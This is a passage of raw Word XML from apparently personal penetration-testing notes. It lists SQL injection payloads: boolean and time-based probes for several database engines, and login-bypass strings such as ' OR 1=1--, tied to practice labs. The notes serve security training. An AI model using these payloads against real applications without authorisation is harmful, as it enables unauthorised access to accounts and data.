          <w:t xml:space="preserve">HackTricks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001715">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For these resources, make sure to put the quotation marks at the start of each command, and to put comments (--) on the end of the command to make it work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001716">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001717">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001718">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001719">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--    -- page normal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--    -- page different</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; IF (1=1) WAITFOR DELAY '0:0:5'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="450"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tested in Medtech .121</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000171F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL / MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001720">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001723">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND SLEEP(5)-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001725">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001726">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001727">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001728">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001729">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR pg_sleep(5)--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' || pg_sleep(10)--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000172F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001730">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001731">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001732">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' || (SELECT CASE WHEN 1=1 THEN dbms_pipe.receive_message('a',5) END FROM dual)-- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001733">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001734">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001735">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001736">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001737">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001738">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001739">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017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3B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bpf5ggrrt34u" w:id="190"/>
      <w:bookmarkEnd w:id="190"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL authentication bypass (to get past login page)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While we've been focusing so much on SQL injections, we need to make sure not to forget the basic authentication bypass that we can do with SQL, like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000173F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001740">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001741">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL authentication bypass was seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId468">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cockpit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001742">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used </w:t>
      </w:r>
      <w:hyperlink r:id="rId469">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list of things to try</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001743">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;username&gt;' OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001744">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'OR '' = '  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001745">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the one that worked for Cockpit according to </w:t>
      </w:r>
      <w:hyperlink r:id="rId470">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1746">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allows authentication without a valid username.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001747">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="888"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
